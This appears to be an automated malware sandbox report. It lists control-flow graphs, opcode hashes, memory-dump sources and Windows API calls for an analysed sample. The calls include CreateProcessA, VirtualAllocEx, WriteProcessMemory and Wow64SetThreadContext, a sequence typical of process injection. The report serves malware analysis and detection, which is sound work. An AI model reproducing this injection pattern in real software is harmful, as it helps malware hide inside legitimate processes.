                                          control_flow_graph 2659 6ca5800-6ca5812 2660 6ca583c-6ca5840 2659->2660 2661 6ca5814-6ca5835 2659->2661 2662 6ca584c-6ca585b 2660->2662 2663 6ca5842-6ca5844 2660->2663 2661->2660 2664 6ca585d 2662->2664 2665 6ca5867-6ca5893 2662->2665 2663->2662 2664->2665 2669 6ca5899-6ca589f 2665->2669 2670 6ca5ac0-6ca5b07 2665->2670 2672 6ca5971-6ca5975 2669->2672 2673 6ca58a5-6ca58ab 2669->2673 2701 6ca5b09 2670->2701 2702 6ca5b1d-6ca5b29 2670->2702 2675 6ca5998-6ca59a1 2672->2675 2676 6ca5977-6ca5980 2672->2676 2673->2670 2677 6ca58b1-6ca58be 2673->2677 2681 6ca59a3-6ca59c3 2675->2681 2682 6ca59c6-6ca59c9 2675->2682 2676->2670 2678 6ca5986-6ca5996 2676->2678 2679 6ca5950-6ca5959 2677->2679 2680 6ca58c4-6ca58cd 2677->2680 2683 6ca59cc-6ca59d2 2678->2683 2679->2670 2686 6ca595f-6ca596b 2679->2686 2680->2670 2684 6ca58d3-6ca58eb 2680->2684 2681->2682 2682->2683 2683->2670 2690 6ca59d8-6ca59eb 2683->2690 2687 6ca58ed 2684->2687 2688 6ca58f7-6ca5909 2684->2688 2686->2672 2686->2673 2687->2688 2688->2679 2696 6ca590b-6ca5911 2688->2696 2690->2670 2692 6ca59f1-6ca5a01 2690->2692 2692->2670 2695 6ca5a07-6ca5a14 2692->2695 2695->2670 2698 6ca5a1a-6ca5a2f 2695->2698 2699 6ca591d-6ca5923 2696->2699 2700 6ca5913 2696->2700 2698->2670 2710 6ca5a35-6ca5a58 2698->2710 2699->2670 2703 6ca5929-6ca594d 2699->2703 2700->2699 2704 6ca5b0c-6ca5b0e 2701->2704 2706 6ca5b2b 2702->2706 2707 6ca5b35-6ca5b51 2702->2707 2708 6ca5b52-6ca5b58 2704->2708 2709 6ca5b10-6ca5b1b 2704->2709 2706->2707 2717 6ca5b5a-6ca5b78 call 6ca1070 2708->2717 2718 6ca5b7c-6ca5b7f 2708->2718 2709->2702 2709->2704 2710->2670 2715 6ca5a5a-6ca5a65 2710->2715 2719 6ca5ab6-6ca5abd 2715->2719 2720 6ca5a67-6ca5a71 2715->2720 2717->2718 2722 6ca5b81-6ca5b87 2718->2722 2723 6ca5b97-6ca5b99 2718->2723 2720->2719 2730 6ca5a73-6ca5a89 2720->2730 2724 6ca5b8b-6ca5b8d 2722->2724 2725 6ca5b89 2722->2725 2746 6ca5b9b call 6ca5c18 2723->2746 2747 6ca5b9b call 6ca6a20 2723->2747 2748 6ca5b9b call 6ca69b0 2723->2748 2724->2723 2725->2723 2726 6ca5ba1-6ca5ba5 2728 6ca5bf0-6ca5c00 2726->2728 2729 6ca5ba7-6ca5bbe 2726->2729 2729->2728 2737 6ca5bc0-6ca5bca 2729->2737 2734 6ca5a8b 2730->2734 2735 6ca5a95-6ca5aae 2730->2735 2734->2735 2735->2719 2741 6ca5bcc-6ca5bdb 2737->2741 2742 6ca5bdd-6ca5bed 2737->2742 2741->2742 2746->2726 2747->2726 2748->2726
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq$d
                                          • API String ID: 0-2356140993
                                          • Opcode ID: e1b7d0988489559fc7fde0cd49905812108644cf1573c0b924f6ec1bf35ae33b
                                          • Instruction ID: 2f0ee1fa400e0b626dae9ef3a0c223561acf5451a182dd0c450bb09095fe2d4c
                                          • Opcode Fuzzy Hash: e1b7d0988489559fc7fde0cd49905812108644cf1573c0b924f6ec1bf35ae33b
                                          • Instruction Fuzzy Hash: C2D156307007028FCB54CF28C58496ABBF6FF88314B99C969D45A9B665DB30FD46CBA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2815 6ca1889-6ca18aa 2816 6ca199e-6ca19c3 2815->2816 2817 6ca18b0-6ca18b2 2815->2817 2818 6ca19ca-6ca19ee 2816->2818 2817->2818 2819 6ca18b8-6ca18c4 2817->2819 2831 6ca19f5-6ca1a19 2818->2831 2824 6ca18d8-6ca18e8 2819->2824 2825 6ca18c6-6ca18d2 2819->2825 2824->2831 2832 6ca18ee-6ca18fc 2824->2832 2825->2824 2825->2831 2836 6ca1a20-6ca1aa5 call 699eb89 2831->2836 2835 6ca1902-6ca1907 2832->2835 2832->2836 2868 6ca1909 call 6ca1a98 2835->2868 2869 6ca1909 call 6ca1889 2835->2869 2859 6ca1aaa-6ca1ab8 call 6ca1070 2836->2859 2838 6ca190f-6ca1958 2853 6ca195a-6ca1973 2838->2853 2854 6ca197b-6ca199b 2838->2854 2853->2854 2864 6ca1aba-6ca1ac0 2859->2864 2865 6ca1ad0-6ca1ad2 2859->2865 2866 6ca1ac2 2864->2866 2867 6ca1ac4-6ca1ac6 2864->2867 2866->2865 2867->2865 2868->2838 2869->2838
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq$Hnq
                                          • API String ID: 0-3116299003
                                          • Opcode ID: dcb97325e05aa39a19602349ae8a0462f1140cfe25ffcbb47cbbfd850e922c4e
                                          • Instruction ID: f6259161f14d93d04d6c8615e1bab1ab95b505d193e2f11d9eb799245ae3d644
                                          • Opcode Fuzzy Hash: dcb97325e05aa39a19602349ae8a0462f1140cfe25ffcbb47cbbfd850e922c4e
                                          • Instruction Fuzzy Hash: 4351AD307043059FC799AF38C854A6E7BA6FF86314B1844ACE5068B7A5DF35ED06CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq$(nq
                                          • API String ID: 0-2974481825
                                          • Opcode ID: bc85da9b89c617552ff6dad2ea926f2b7cfab77b815767ddc69de110f85c02ca
                                          • Instruction ID: 6a3c98d073bc8a98c639a2bdf0ad2818e03740cd30a3044b8c2ca14b8845ff70
                                          • Opcode Fuzzy Hash: bc85da9b89c617552ff6dad2ea926f2b7cfab77b815767ddc69de110f85c02ca
                                          • Instruction Fuzzy Hash: F151DE317042459FDB959F28D854AAE3BA6FF84314F21846DE90ACB395CF39DD06C7A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,nq
                                          • API String ID: 0-1069744364
                                          • Opcode ID: 445d39f72e69d256e6923409646d050d7577264ed90df9e961828f9bea637ff4
                                          • Instruction ID: 47c0dbb963e8cd464081571ca7a7af59c0d47516d8d2d34940c3946d6a36fb27
                                          • Opcode Fuzzy Hash: 445d39f72e69d256e6923409646d050d7577264ed90df9e961828f9bea637ff4
                                          • Instruction Fuzzy Hash: 1D521675A002288FDB64DF69C985BEDBBF6BF88300F1541D9E509A7391DA309E81CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (_jq
                                          • API String ID: 0-2603807687
                                          • Opcode ID: 063cb768cf9d9af57bb30574c98b76ec5dab92ac57bb952f021edf670980e837
                                          • Instruction ID: bdeabcb67e7e0ad21e57efde044c85913f3553e985c15b02ae3a06177292b052
                                          • Opcode Fuzzy Hash: 063cb768cf9d9af57bb30574c98b76ec5dab92ac57bb952f021edf670980e837
                                          • Instruction Fuzzy Hash: 3E227D35A002159FDB44DFA9C894AADBBB2FF88304F158059E909EB3A5CB75ED41CB90
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 069C836A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: da5eda7f549339f3acc18083644435a8ba7851212f61299dabc9662ce44b3846
                                          • Instruction ID: 4231f60b9d2fdc25074befee7abc6a2da4dd9ca4c4c1e50008d1a1e547a0c53c
                                          • Opcode Fuzzy Hash: da5eda7f549339f3acc18083644435a8ba7851212f61299dabc9662ce44b3846
                                          • Instruction Fuzzy Hash: 80816870D006098FDB50CFA9C9957EEBFF6BF48360F24852DE815A7654DB749882CB82
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 069C836A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6526d4cb2b47df17f8f7f127275b2da300aba7fc536193fd3e98d2bbb7ebddb7
                                          • Instruction ID: 2b595d8d4b559fd624b01f408fe40e1ac3e2cfcb93ab0471b4953cd3a96e9bee
                                          • Opcode Fuzzy Hash: 6526d4cb2b47df17f8f7f127275b2da300aba7fc536193fd3e98d2bbb7ebddb7
                                          • Instruction Fuzzy Hash: C7816871D006098FDB50CFA9C9957EEBFF6BF48320F24852DE814A7654DB749882CB82
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 024EAC7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_24e0000_file.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 359aab8210800e00db7ab21b58f48d1f8f443d37b583baf1fb786e77fe1372a7
                                          • Instruction ID: beaa7d9ac521f586f1932c04677eea117b64e1204e61bdc4b05a9344c2e94592
                                          • Opcode Fuzzy Hash: 359aab8210800e00db7ab21b58f48d1f8f443d37b583baf1fb786e77fe1372a7
                                          • Instruction Fuzzy Hash: 3C711370A00B158FEB24DF6AD14475BBBF6BF88304F04892ED48A97B50D775E845CBA0
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069C92A0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: f46eb15c86abab3182340d9e12a958a28de35238496e52ee9b4bfd2264697dd7
                                          • Instruction ID: 990643465a444f653e66513f15a664d72069e56409aa744d265a2b8ff0713f72
                                          • Opcode Fuzzy Hash: f46eb15c86abab3182340d9e12a958a28de35238496e52ee9b4bfd2264697dd7
                                          • Instruction Fuzzy Hash: 7D214871D00249DFDB10CFAAC885BEEBBF5FF48310F10842AE959A7250CB789945CBA1
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069C92A0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 165d9c4593ebdf02a179a68d1a7b587da052ccadec12e599af1d39dc0ba0a3bd
                                          • Instruction ID: dde35fc435078afedf1a35e986f7986e4e1b34083af2936627e5e1bdab386f8b
                                          • Opcode Fuzzy Hash: 165d9c4593ebdf02a179a68d1a7b587da052ccadec12e599af1d39dc0ba0a3bd
                                          • Instruction Fuzzy Hash: 19211B71D003499FDB10DFAAC945BDEBBF5FF48320F108429E959A7250C7789954CBA1
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069C89D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 00593fcea7112281c69d8b8b245b7af4b4a600e5e8061b7732123973c139fd6d
                                          • Instruction ID: d004440b64216c43344bd0e88907e951ff788a7012280bcd2fc691b0be4c083f
                                          • Opcode Fuzzy Hash: 00593fcea7112281c69d8b8b245b7af4b4a600e5e8061b7732123973c139fd6d
                                          • Instruction Fuzzy Hash: CA2166719003098FDB10DFAAC5457EEBFF4AF48320F50842AD459A7241CB789984CBA2
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024ED2C6,?,?,?,?,?), ref: 024ED387
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_24e0000_file.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: a27400a1e698493d43285eba84d3ca288b85c5353fb5ae072bacd38ae074d13d
                                          • Instruction ID: ed1c307e7a16c576a8f296df166f84185d0a62cce4728d0711d8036fb117b135
                                          • Opcode Fuzzy Hash: a27400a1e698493d43285eba84d3ca288b85c5353fb5ae072bacd38ae074d13d
                                          • Instruction Fuzzy Hash: AA21E4B5D00208DFDB10CF9AD984AEEBBF9FB48310F14805AE919A3350D378A954CFA5
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069C89D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: bf8434c385b3031735fda2a4c843d347a01bae27f274280a893a29279a3090ee
                                          • Instruction ID: 8b8e9e9bebdc8d07df910001d543a217771641fee797a77e67f5b367b49ca9b1
                                          • Opcode Fuzzy Hash: bf8434c385b3031735fda2a4c843d347a01bae27f274280a893a29279a3090ee
                                          • Instruction Fuzzy Hash: 52213771D002098FDB10DFAAC5857AEBFF4EF48324F10842AD459A7240CB78A944CFA1
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069A744C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: afb9d5ce121f94de2d2c11c15e3ce5cbbd27471e617fab14b29e61fa8b3f5f47
                                          • Instruction ID: 2f90bf860c2901b4e39dd26cef03851ba46d789fe24a0e93317c6a9044de7324
                                          • Opcode Fuzzy Hash: afb9d5ce121f94de2d2c11c15e3ce5cbbd27471e617fab14b29e61fa8b3f5f47
                                          • Instruction Fuzzy Hash: F52107719003499FDB10DFAAC845AEEFBF5EF48320F548429E419A7250CB78A945CFA5
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069A744C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 15e5d54d2f7343ebfad799383073ade2060f46a657118b2c760bb5f26196ef25
                                          • Instruction ID: b9d2f5eeae8fa544f77fff8ba4054fe0e08884f4ccb65d4832993613d3a43f00
                                          • Opcode Fuzzy Hash: 15e5d54d2f7343ebfad799383073ade2060f46a657118b2c760bb5f26196ef25
                                          • Instruction Fuzzy Hash: 5421E5B1D003099FDB10DFAAC845AEEFBF5EF48320F54842AD519A7250CB78A944CFA5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069C8FD6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 21f8b51e650794302b4b55bad79a07437f5100113f62d4bb3af6ad9301f6f2a2
                                          • Instruction ID: f24d1798f2f6fee3efbd07a086935faf97de30038353dd49103945c4c07ed960
                                          • Opcode Fuzzy Hash: 21f8b51e650794302b4b55bad79a07437f5100113f62d4bb3af6ad9301f6f2a2
                                          • Instruction Fuzzy Hash: 58116A719002089FDB10DFAAC945BEFBFFAEF88320F108419E519A7250CB79A540DFA1
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 068FE2C4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132942549.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_68f0000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 57089aa89374b1cc3abc5362e89f3dd588c6285ec602af7a1b05516ba93b419d
                                          • Instruction ID: 473bfea2dcfdc5d1709938fafb62c7644be140195d5cdbf8f406bcdb8374f6bf
                                          • Opcode Fuzzy Hash: 57089aa89374b1cc3abc5362e89f3dd588c6285ec602af7a1b05516ba93b419d
                                          • Instruction Fuzzy Hash: 8011F7B1D002099FDB10DFAAC944AAEFBF5FF48320F10842AD519A7250DB79A944CFA1
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 024E959D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_24e0000_file.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: c95dd2ab8d7ef24ee14bf37041cb10d48d8b321949c88d60e75d5e58f5038f31
                                          • Instruction ID: 2fc67dc318b5dc141d142bb2177203639c8fd4af94b439319f989979022add9b
                                          • Opcode Fuzzy Hash: c95dd2ab8d7ef24ee14bf37041cb10d48d8b321949c88d60e75d5e58f5038f31
                                          • Instruction Fuzzy Hash: B621E4B19053C4CEDB11DF69D1083EBBFF0EB15304F08449AC489A7682C3399A08CBB5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069C8FD6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 0df7c9a670e0937a5c6afb1181f50559f21935d01d137533576b16ce762d8570
                                          • Instruction ID: df4a6416506890c96bd20c01a4f81f5c4f5d2a31fd91e0aa5c90dda8bc97a5c5
                                          • Opcode Fuzzy Hash: 0df7c9a670e0937a5c6afb1181f50559f21935d01d137533576b16ce762d8570
                                          • Instruction Fuzzy Hash: 631149719002499FDB10DFAAC944AEFBFF5EF88320F10841AE519A7250CB79A944CFA1
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 024E959D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_24e0000_file.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: d76ac77d57b88eedfcd70e07f1136f28dbb2eb124254918981ccc7701f59ce9f
                                          • Instruction ID: 4669785c56c31a4d3c2ebd04b6211d6891f5943d9e53b489e84984176f76116b
                                          • Opcode Fuzzy Hash: d76ac77d57b88eedfcd70e07f1136f28dbb2eb124254918981ccc7701f59ce9f
                                          • Instruction Fuzzy Hash: 3F11EFB1800388CEDB10DF99D1083EFBFF4EB14314F10449AD489A3682D339AA08CFA5
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 024EAC7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_24e0000_file.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 4318bebfb6376f563f6c9954b4378c3863acd9e2472ad7155d0c60540e78be3d
                                          • Instruction ID: dc1477166e7bbbf595f321f38c73eff726c91f9572ebfda733d59da4cd8470fc
                                          • Opcode Fuzzy Hash: 4318bebfb6376f563f6c9954b4378c3863acd9e2472ad7155d0c60540e78be3d
                                          • Instruction Fuzzy Hash: 78110FB6D002498FDB10DF9AC548ADEFBF4EB88714F10841AD819A7210C379A545CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,nq
                                          • API String ID: 0-1069744364
                                          • Opcode ID: 1d8be5fa58ab086dd58bee71ab161cbf0e72a60a5edbe8a1faf8dff3d6cd7a8b
                                          • Instruction ID: ca1b0eb5faeb1ca75ba3c17e347bb911bb9b4b2f801ff214cbdb75ca6b32baa5
                                          • Opcode Fuzzy Hash: 1d8be5fa58ab086dd58bee71ab161cbf0e72a60a5edbe8a1faf8dff3d6cd7a8b
                                          • Instruction Fuzzy Hash: 40C193B4A002189FDB54DF69C945BDDBBF6EF88700F158099E509AB3A5CA34DD81CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq
                                          • API String ID: 0-3676250632
                                          • Opcode ID: 555c439f5aaa264b5e38e3ff7f83ef5dd5f50d1e0a61c807268e57fed16d455d
                                          • Instruction ID: f15938e2ed17d880a172faf469f12999603803bddd2059e72af4f4ca4c80b316
                                          • Opcode Fuzzy Hash: 555c439f5aaa264b5e38e3ff7f83ef5dd5f50d1e0a61c807268e57fed16d455d
                                          • Instruction Fuzzy Hash: 26B10B38A10219DFCB44DFA4D998D9DBBB2FF89304F158159E506AB365DB30ED42CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJoq
                                          • API String ID: 0-3712055613
                                          • Opcode ID: 664c3932f881225202251e70aa4759a11f734aa14f3449075f884df449415015
                                          • Instruction ID: 38697253c70ce4984b2ff3c0b3a3e13460b473489fc4aee1604a0f537778978d
                                          • Opcode Fuzzy Hash: 664c3932f881225202251e70aa4759a11f734aa14f3449075f884df449415015
                                          • Instruction Fuzzy Hash: 95710974E052089FEB44EFA8D54469DBBB2FB89710F208029E505AB359DB38AD45CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJoq
                                          • API String ID: 0-3712055613
                                          • Opcode ID: a3c5aa8bbadbbd531f35ba5e064c16985e9dd52fd663a8472c1ad69d483ff51d
                                          • Instruction ID: 060a48a824f4e74e882121692c8fc2ad4df30e28e5dedf33e04ecf6f7ed20f0e
                                          • Opcode Fuzzy Hash: a3c5aa8bbadbbd531f35ba5e064c16985e9dd52fd663a8472c1ad69d483ff51d
                                          • Instruction Fuzzy Hash: 8271F874E052089FEB44EFE8D54469DBBB2FB89710F208029E509AB359DB38AD45CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: pnq
                                          • API String ID: 0-1150273632
                                          • Opcode ID: e17f01e12bab120b11b19e4d2107cc1bb17dd0ea6b6be1b406a58f710504757e
                                          • Instruction ID: 551febd0d112bb7de09ff202d28c8999bdc47c012d70e46dce6dc4396e088208
                                          • Opcode Fuzzy Hash: e17f01e12bab120b11b19e4d2107cc1bb17dd0ea6b6be1b406a58f710504757e
                                          • Instruction Fuzzy Hash: 9F514F76600104AFCB459FA9CD44D6ABFB7FF8D3147158098E2099B376DA36DC22EB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq
                                          • API String ID: 0-3676250632
                                          • Opcode ID: ee06b1edc96637242eb1ff4ae449d7496729392b795c90bba0879b09053f5ad1
                                          • Instruction ID: a35d0c8a55d39d30c4a789fece506586b1097408ad198ba233f289eaf6749a05
                                          • Opcode Fuzzy Hash: ee06b1edc96637242eb1ff4ae449d7496729392b795c90bba0879b09053f5ad1
                                          • Instruction Fuzzy Hash: 7F418334B107168FCB84AB68C858AAEB7B7AFC9704F10412DD416EB394CF749D46DBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq
                                          • API String ID: 0-2756854522
                                          • Opcode ID: 913a2ac6d9dc15561e8187c757590309408953f71f5abf443cb6b8deed3b7f03
                                          • Instruction ID: 581d0db024f0e3f683334b536cf51bdfe176e2c8d512049ccf955aab6e5c72de
                                          • Opcode Fuzzy Hash: 913a2ac6d9dc15561e8187c757590309408953f71f5abf443cb6b8deed3b7f03
                                          • Instruction Fuzzy Hash: 58419032704244AFCB469F68D814D597FB6FF89320B1680EAE605CF6B2CA35DC11DB51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq
                                          • API String ID: 0-2756854522
                                          • Opcode ID: a97aae9da15ca86ead8483b75d8a933b624ffd1b58e6541201bf6c899a3c7f08
                                          • Instruction ID: 444a282dcc7035c87e3ceb677b09a9ea73da20fc61c9b213dab66ec336d4bb79
